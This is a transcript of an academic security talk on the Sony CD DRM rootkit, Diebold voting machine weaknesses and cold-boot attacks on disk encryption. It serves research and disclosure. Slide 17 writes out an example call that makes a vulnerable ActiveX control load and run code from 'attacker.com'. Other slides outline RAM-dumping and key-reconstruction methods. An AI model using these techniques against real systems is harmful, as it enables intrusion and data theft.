Presentation is loading. Please wait.

Presentation is loading. Please wait.

Security Through the Lens of Failure J. Alex Halderman.

Published byRocio Denny Modified over 9 years ago

Similar presentations

Presentation on theme: "Security Through the Lens of Failure J. Alex Halderman."— Presentation transcript:

1 Security Through the Lens of Failure J. Alex Halderman

2 Thinking About Failure “Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail.” – Bruce Schneier

3 J. Alex Halderman Spectacular Security Failures Wide Impact Costly Repairs Collateral Damage Systemic

4 J. Alex Halderman Disaster Investigation

5 J. Alex Halderman Lessons from Failures New Security Intuitions New Research Directions Improved Public Policy

6 J. Alex Halderman Spectacular Security Failures 1. Compact Disc DRM 2. Electronic Voting 3. Disk Encryption Lessons from the Sony CD-DRM Episode J. A. Halderman and E. Felten USENIX Security 2006

7 J. Alex Halderman Compact Disc DRM Restrict use (Untrusted device) Compatibility (Legacy format)

8 J. Alex Halderman Three Generations 2001 1 st Generation:Passive protection 2003 2 nd Generation:Active protection 2005 3 rd Generation:Weak passive + Aggressive active [H02] [H03] [HF05]

9 J. Alex Halderman A Spectacular Failure Systemic failure Multiple systems cause danger to users Mass exposure Millions of computers vulnerable Difficult repairs Most users unaware they’re at risk High costs Lawsuits, recalls, lost sales

10 J. Alex Halderman SunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs First4Internet

11 J. Alex Halderman Active Protection Drivers Ripper/copier Application Protection driver Normal CD OS Protection driver Autorun # CD Marked “Protected”  Audio CDHybrid CD [H03]

12 J. Alex Halderman Rootkit Magic prefix: $sys$ Files Processes Registry keys Hidden DRM challenge: Users will remove protection driver Vendor response: Install a rootkit to hide it [HF06] “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business

13 J. Alex Halderman Rootkit Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch DRM challenge: Users will remove protection driver Vendor response: Install a rootkit to hide it Attack: Privilege escalation Mistake: Hides arbitrary objects $sys$virus.exe [HF06]

14 J. Alex Halderman Installer DRM challenge: Users will decline to install software Vendor response: Install regardless of consent Attack: Privilege escalation Mistake: Incorrect permissions  13+ MB installed before EULA screen Everyone: Full Control Runs with administrator privileges next time CD is inserted

15 J. Alex Halderman Installer DRM challenge: Users will decline to install software Vendor response: Install regardless of consent Attack: Privilege escalation Mistake: Incorrect permissions  Sony releases patch…but, patch calls potentially booby trapped code [HF06] How do users know they need to patch? Vulnerable even if refused installation

16 J. Alex Halderman Uninstallers DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access “HTTP GET /XCP.dat” Web page calls ActiveX control CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp() 2. 3. 4. User obtains single-use code for uninstallation web page 1. [HF06]

17 J. Alex Halderman Control accepts arbitrary URL Remote code not authenticated Control not removed after use Uninstallers DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access Attack: Remote code execution Mistakes: “HTTP GET /XCP.dat” Server sony-bmg.com XCP.dat Client CodeSupport.ocx Rookie mistakes Victim visits attacker’s web page CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) 1. 2. Client executes code from Evil.dat with user’s privileges 3. “HTTP GET /Evil.dat” Server attacker.com Evil.dat “Oops!... I did it again” [HF06]

18 J. Alex Halderman CD DRM Impact Millions of dangerous CDs recalled Class action suits against Sony, vendors FTC consumer protection investigation Both protection vendors leave the market Labels abandon CD copy protection

19 J. Alex Halderman CD DRM Lessons DRM problem → inherent conflict New intuition: DRM as a threat to client security Lack of transparency hid problems DMCA reform Mandatory disclosure Conflicting incentives led vendors to take risks Liability for harm to users

20 J. Alex Halderman Spectacular Security Failures 1. Compact Disc DRM 2. Electronic Voting 3. Disk Encryption Security Analysis of the Diebold AccuVote-TS Voting Machine A. J. Feldman, J. A. Halderman, and E. Felten EVT 2007 Machine-Assisted Election Auditing J. A. Calandrino, J. A. Halderman, and E. Felten EVT 2007

21 J. Alex Halderman DRE Voting Machines = Direct Recording Electronic

22 J. Alex Halderman Diebold’s History of Secrecy Prevented states from allowing independent security audits – hid behind NDAs, trade secret law Source code leaked in 2003, Hopkins researchers found major flaws Diebold responded with vague legal threats, personal attacks, disinformation campaign Internal emails leaked in 2003, reveal poor security practices Diebold tried to suppress sites with legal threats

23 J. Alex Halderman We Get a Machine (2006) Diebold AccuVote TS Obtained legally from an anonymous private party Software version certified and used in actual elections First complete, public, independent security audit of a DRE

24 J. Alex Halderman A Spectacular Failure Systemic failure Similar risks in different vendors’ products Mass exposure Millions of votes at risk Difficult repairs Some attacks not patchable High costs Many states have to discard machines

25 J. Alex Halderman Reverse Engineering [FHF07]

26 J. Alex Halderman Inserting Code Bootloader WinCE Kernel BallotStation FBOOT.NB0 Bootloader NK.BIN WinCE Kernel INSTALL.INS BallotStation (Internal Flash or EPROM) (Internal Flash) [FHF07]

27 J. Alex Halderman [FHF07] Stealing Votes Kernel BallotStation Primary Vote RecordBackup Vote Record Audit Log Primary Vote RecordBackup Vote Record Audit Log Stuffer

28 J. Alex Halderman Voting Machine Viruses [FHF07] Reboot Single point of infection Entire county or state

29 J. Alex Halderman Physical Security [FHF07]

30 J. Alex Halderman Physical Security [FHF07]

31 J. Alex Halderman HartSequoiaDiebold California “Top-to-Bottom” Review

32 J. Alex Halderman E-Voting Lessons Systemic threats of code injection, viruses New intuition: DREs and desktops suffer like threats Blatant problems slipped by gov’t process Mandatory transparency, paper trails Improved specs and certification Market unable to build trustworthy e-voting Can we use computers to improve voting without having to trust them?

33 J. Alex Halderman Improving Voting Security Paper Ballots Physical tampering “Retail” fraud After the election Redundancy + Different failure modes = Greater security Electronic Records Cyber-tampering “Wholesale” fraud Before the election But…Redundancy only helps if we use both records!

34 J. Alex Halderman Auditing Approaches Precinct-based auditing (standard practice) Ballot-based auditing Expensive Privacy problems

35 J. Alex Halderman 100 marbles, 10% blue6300 beads, 10% blue How large a sample do we need to find error?

36 J. Alex Halderman Why Not Ballot-Based? Alice Bob Alice ● Alice ○ Bob ○ Alice ● Bob ● Alice ○ Bob Need to match up electronic with paper ballots. Difficult without compromising the secret ballot! 1 Alice 2 Bob 3 Alice ● Alice ○ Bob 1 ○ Alice ● Bob 2 ● Alice ○ Bob 3 325631 Alice 218594 Bob 810581 Alice ● Alice ○ Bob 325631 ○ Alice ● Bob 218594 ● Alice ○ Bob 810581

37 J. Alex Halderman Machine-Assisted Auditing = ○ Alice ● Bob 1 1 Bob 2 Alice... 929 Bob Alice: 510 Bob: 419 ○ Alice ● Bob Step 1. Check electronic records against paper records using a recount machine. Shuffled ballots [CHF07]

38 J. Alex Halderman Machine-Assisted Auditing = ○ Alice ● Bob 1 1 Bob 2 Alice... 929 Bob Alice: 510 Bob: 419 ○ Alice ● Bob [CHF07]

39 J. Alex Halderman = 321 Bob 716 Alice Machine-Assisted Auditing ○ Alice ● Bob 1 1 Bob 2 Alice... 929 Bob = ○ Alice ● Bob 321 ● Alice ○ Bob 716 ○ Alice ● Bob 1 Step 2. Audit the recount machine by selecting random ballots for human inspection. [CHF07]

40 J. Alex Halderman As efficient as ballot-based auditing, while protecting the secret ballot. Machine-Assisted Auditing Machine Recount Manual Audit We can use a machine without having to trust it! [CHF07]

41 J. Alex Halderman Considering Ballot Content Goal: Reject hypothesis that ≥ 5% of ballots differ between electronic and paper Goal: Reject hypothesis that ≥ 5% of ballots are marked electronically for Alice but on paper for Bob. Only need to audit ballots marked for Alice. Goal: Reject hypothesis that ≥ 5% of ballots differ between electronic and paper [CHF07]

42 J. Alex Halderman Evaluation 2006 Virginia U.S. Senate race 0.3% margin of victory We want 99% confidence [CHF07]

43 J. Alex Halderman Spectacular Security Failures 1. Compact Disc DRM 2. Electronic Voting 3. Disk Encryption Cold-Boot Attacks on Encryption Keys J. A. Halderman, S. Schoen, N. Heninger, W. Clarkson, W. Paul, J. Calandrino, A. Feldman, J. Appelbaum, E. Felten In submission, 2008

44 J. Alex Halderman Data Theft Threat OS Access ControlAttacker’s Computer

45 J. Alex Halderman Disk Encryption Defense File System Disk Drivers On-the-Fly Crypto Password: ********

46 J. Alex Halderman A Spectacular Failure Systemic failure Nearly all disk encryption products at risk Mass exposure Millions vulnerable in common use case Difficult repairs No simple hardware or software remedies High costs Critical data at risk despite encryption

47 J. Alex Halderman Disk Encryption Defense Security Assumptions: The OS protects the key in RAM The attacker might reboot to circumvent the OS, but since RAM is volatile, the key will be lost

48 J. Alex Halderman 0 Dynamic RAM Volatility 1 Write “1” 1 DRAM Cell (Capacitor) 0 Refresh (Read and rewrite) Refresh Interval ≈ 32 ms What if we don’t refresh? Security Hardness Assumptions: Data fades almost instantaneously without refresh Any residual data is difficult to recover

49 J. Alex Halderman 5 secs30 secs60 secs300 secs DRAM Remanence DRAM data fades almost instantaneously Data fades gradually, over seconds or minutes Unidirectional Highly predictable Decay doesn’t spike until 10s or 100s of missed refreshes (almost 100% recovery for first few seconds) [HSHCPCFAF08]

50 J. Alex Halderman Capturing Residual Data Complication Booting OS overwrites large areas of RAM Solution Boot a small low-level program to write out memory content Implementations PXE Dump (9 KB) EFI Dump (10 KB) USB Dump (22 KB) [HSHCPCFAF08] Any residual data is difficult to recover Residual data can be captured easily, with no special equipment

51 J. Alex Halderman Basic Cold-Boot Attack Dumping RAM… Screen-locked machine (if hibernating/sleeping, just wake it up!) [HSHCPCFAF08]

52 J. Alex Halderman Countermeasure BIOS: Clearing RAM… !!! Common in machines that support ECC RAM

53 J. Alex Halderman Advanced Cold-Boot Attack Attacker’s Computer Dumping RAM… Won’t RAM data decay too quickly? [HSHCPCFAF08]

54 J. Alex Halderman DRAM Cooling [HSHCPCFAF08]

55 J. Alex Halderman Dealing with Bit Errors Some bit errors inevitable, especially without cooling (worsening as memory density increases) Given corrupted K’, find K Brute-force search over low Hamming distance to K’ 256-bit key with 10% unidirectional error rate (slow!) Naïve Approach Most programs store precomputed derivatives of K, for performance (e.g. key schedules) These derivatives contain redundancy, treat them as error correcting codes (Performance vs. security) Insight [HSHCPCFAF08]

56 J. Alex Halderman AES Key Schedule  Round 0 key (= K) Round 1 key Round 10 key … … Core 128-bit key K  10 more 128-bit keys for cipher rounds Output: 176 bytes of key material

57 J. Alex Halderman AES Key Reconstruction  Round 0 key (= K) Round 1 key Core: Rotate 8 ByteSub Slices: 7 bytes, uniquely determined by 4 bytes from K Find likely decodings of slice, given error model Combine decodings to form candidate K’s Test candidates against full key schedule In practice, reconstruction almost always unique [HSHCPCFAF08]

58 J. Alex Halderman Reconstructing Other Keys 256-bit AES, DES (key schedules) LRW tweak keys (multiplication tables) RSA private keys (primes P and Q) Also: Key Finding Insight: Target precomputation products instead of keys, use their redundant structure to locate them automatically [HSHCPCFAF08]

59 J. Alex Halderman Practical Attacks Windows Vista BitLocker Mac OS FileVault Linux dm-crypt Linux LoopAES TrueCrypt [HSHCPCFAF08]

60 J. Alex Halderman Disk Encryption Lessons DRAM security assumptions were wrong OS access control weaker than thought New threat model for memory New risk profile for users Abstraction hid security problems Investigate other abstractions CPU microcode? Running software has nowhere to store secrets Secure memory architectures Storing secrets in the user

61 J. Alex Halderman Contributions and Impacts 1. Compact disc DRM Inherent limitations of CD copy protection [H02, H03] Client security dangers of aggressive DRM [HF06]  Music industry abandoned CD DRM, then DRM 2. E-voting First comprehensive academic review of a DRE [FHF07] Systemic problems in related voting systems [CFHWYZ07] Trustworthy computer-assisted auditing [CHF07]  National shift away from DRE voting 3. Disk encryption [HSHCPCFAF08] Cold-boot attacks against encrypted disks Experimental characterization of DRAM remanence Automatic key finding and reconstruction  Security community rethinking memory threat models

62 J. Alex Halderman Eight Research Directions I Didn’t Have Time to Talk About Privacy protection for camera phones H., Waters, and Felten WPES 04 Client puzzles for denial-of-service prevention Waters, Juels, H., and Felten CCS 04 Convenient web password security H., Waters, and Felten WWW 05 Harvesting challenges from oblivious online sources H. and Waters CCS 07 Voting machine hardware analysis H. and Feldman 2008 AACS security flaws, DRM game theory In preparation Safely using cryptographic randomness in elections In preparation Repairing insecure DRE voting machines In preparation

63 J. Alex Halderman www.cs.princeton.edu/~jhalderm Thank You!

64 J. Alex Halderman References H02 H. Evaluating New Copy-Prevention Techniques for Audio CDs. DRM 2002. H03 H. Analysis of the MediaMax CD3 Copy-Prevention System. 2003. HF06 H. and Felten. Lessons from the Sony CD DRM Episode. USENIX Security 2006. FHF07 Feldman, H., and Felten. Security Analysis of the Diebold AccuVote-TS Voting Machine. EVT 2007. CHF07 Calandrino, H., and Felten. Machine-Assisted Election Auditing. EVT 2007. CFHWYZ07 Calandrino, Feldman, H., Zeller, Yu, and Wagner. Source Code Review of the Diebold Voting System. 2007. HSHCPCFAF08 H., Schoen, Heninger, Clarkson, Paul, Calandrino, Feldman, Appelbaum, and Felten. Lest We Remember: Cold Boot Attacks on Encryption Keys. In submission, 2008.

Download ppt "Security Through the Lens of Failure J. Alex Halderman."

Similar presentations

Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.

Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.
Electronic Voting: Danger and Opportunity J. Alex Halderman Department of Computer Science Center for Information Technology Policy Princeton University.

Electronic Voting: Danger and Opportunity J. Alex Halderman Department of Computer Science Center for Information Technology Policy Princeton University.
White-Box Cryptography

White-Box Cryptography
1 The Sony CD DRM Debacle A case study of digital rights management.

1 The Sony CD DRM Debacle A case study of digital rights management.
1 J. Alex Halderman A Convenient Method for Securely Managing Passwords J. Alex Halderman Princeton Brent Waters Stanford Edward W. Felten Princeton.

1 J. Alex Halderman A Convenient Method for Securely Managing Passwords J. Alex Halderman Princeton Brent Waters Stanford Edward W. Felten Princeton.
Securing. Agenda  Hard Drive Encryption  User Account Permissions  Root Level Access  Firewall Protection  Malware Protection.

Securing. Agenda  Hard Drive Encryption  User Account Permissions  Root Level Access  Firewall Protection  Malware Protection.
1 MIS 2000 Class 22 System Security Update: Winter 2015.

1 MIS 2000 Class 22 System Security Update: Winter 2015.
1 J. Alex Halderman Security Failures in Electronic Voting Machines Ariel Feldman Alex Halderman Edward Felten Center for Information Technology Policy.

1 J. Alex Halderman Security Failures in Electronic Voting Machines Ariel Feldman Alex Halderman Edward Felten Center for Information Technology Policy.
VM: Chapter 5 Guiding Principles for Software Security.

VM: Chapter 5 Guiding Principles for Software Security.
1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.

1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.
1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.

1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.
 Guarantee that EK is safe  Yes because it is stored in and used by hw only  No because it can be obtained if someone has physical access but this can.

 Guarantee that EK is safe  Yes because it is stored in and used by hw only  No because it can be obtained if someone has physical access but this can.
Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.

Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.
Iron Key and Portable Drive Security Zakary Littlefield.

Iron Key and Portable Drive Security Zakary Littlefield.
Lest We Remember Cold-Boot Attacks Against Disk Encryption J. Alex Halderman, Seth D. Schoen, Nadia Heninger, William Clarkson, William Paul, Joseph A.

Lest We Remember Cold-Boot Attacks Against Disk Encryption J. Alex Halderman, Seth D. Schoen, Nadia Heninger, William Clarkson, William Paul, Joseph A.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
0x1A Great Papers in Computer Security

0x1A Great Papers in Computer Security
Alter – Information Systems 4th ed. © 2002 Prentice Hall 1 E-Business Security.

Alter – Information Systems 4th ed. © 2002 Prentice Hall 1 E-Business Security.
Chapter Nine Maintaining a Computer Part III: Malware.

Chapter Nine Maintaining a Computer Part III: Malware.

Similar presentations

Ads by Google